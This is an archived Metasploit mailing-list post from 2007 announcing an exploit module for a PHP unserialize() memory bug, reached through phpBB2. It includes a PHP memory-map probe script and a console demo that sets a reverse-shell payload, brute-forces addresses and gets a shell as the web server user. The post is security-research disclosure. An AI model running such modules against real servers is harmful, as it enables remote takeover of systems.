Metasploit mailing list archives
Metasploit 3 module for PHP < 4.5.0 unserialize() bug
From: hdm at metasploit.com (H D Moore)
Date: Sat, 10 Mar 2007 19:40:17 -0600
This is the first metasploit 3 exploit for a vulnerability covered by Stefan Esser's Month of PHP bugs. It exploits a PHP interpreter bug through a fully-patched version of phpBB2. We are still working on a "generic" exploit for all web applications that unserialize() POST data. This one was tricky because we had to work around the Apache 2 requests limits to fit a ridiculous amount of data into multiple cookie headers. Stefan Esser should be credited with discovery, patch, the cookie technique, and the generic proof-of-concept. GML and I managed to hack this module together between last night and this afternoon. This module sends about 3MB of traffic per request. It needs 900k just to trigger the vulnerability and uses another 2MB to make the brute force process somewhat fast. You will need a very fast network connection to use this module :-) You can browse the module source online at: http://metasploit.com/svn/framework3/trunk/modules/exploits/multi/php/php_unserialize_zval_phpbb2.rb You can read more about the vulnerability at: http://www.php-security.org/MOPB/MOPB-04-2007.html Anyone with Metasploit 3 installed can just use 'svn update' to grab the latest patches along with this module. We are looking for feedback about what address ranges to cover for various platforms. If you have a Linux system with PHP < 4.5.0, please install the following PHP code, access it in your browser, and send me the output. Your feedback is appreciated! --start of maps.php--- <pre> <?php $buff = str_repeat("X", 1024*1024*4); readfile("/proc/version"); readfile("/proc/self/maps"); ?> </pre> --end of maps.php Quick demonstration: msf > use exploit/multi/php/php_unserialize_zval_phpbb2 msf exploit(php_unserialize_zval_phpbb2) > show targets Exploit targets: Id Name -- ---- 0 Linux x86 phpBB2 msf exploit(php_unserialize_zval_phpbb2) > set TARGET 0 TARGET => 0 msf exploit(php_unserialize_zval_phpbb2) > set PAYLOAD linux/x86/shell_reverse_tcp PAYLOAD => linux/x86/shell_reverse_tcp msf exploit(php_unserialize_zval_phpbb2) > set RHOST 127.0.0.1 RHOST => 127.0.0.1 msf exploit(php_unserialize_zval_phpbb2) > set RPORT 80 RPORT => 80 msf exploit(php_unserialize_zval_phpbb2) > set URI /faq.php URI => /faq.php msf exploit(php_unserialize_zval_phpbb2) > exploit [*] Started reverse handler [*] Creating the request... [*] Trying address 0xb6000400... [*] Received a response: 200 OK [*] Trying address 0xb6100400... [*] Received a response: 200 OK [*] Trying address 0xb6200400... [*] Received a response: 200 OK [*] Trying address 0xb6300400... [*] Received a response: 200 OK [*] Trying address 0xb6400400... [*] Received a response: 200 OK [*] Trying address 0xb6500400... [*] Received a response: 200 OK [*] Trying address 0xb6600400... [*] Received a response: 200 OK [*] Trying address 0xb6700400... [*] Received a response: 200 OK [*] Trying address 0xb6800400... [*] Received a response: 200 OK [*] Trying address 0xb6900400... [*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:50376) [*] No response from the server bash -i; bash: no job control in this shell apache at shank /home/httpd/phpBB2 $ id uid=81(apache) gid=81(apache) groups=81(apache) apache at shank /home/httpd/phpBB2 $ -HD
Current thread:
- Metasploit 3 module for PHP < 4.5.0 unserialize() bug H D Moore (Mar 10)
- Metasploit 3 module for PHP < 4.5.0 unserialize() bug Kashif Iftikhar (Mar 12)
- Metasploit 3 module for PHP < 4.5.0 unserialize() bug Kashif Iftikhar (Mar 13)
- Metasploit 3 module for PHP < 4.5.0 unserialize() bug H D Moore (Mar 17)
- Metasploit 3 module for PHP < 4.5.0 unserialize() bug Kashif Iftikhar (Mar 12)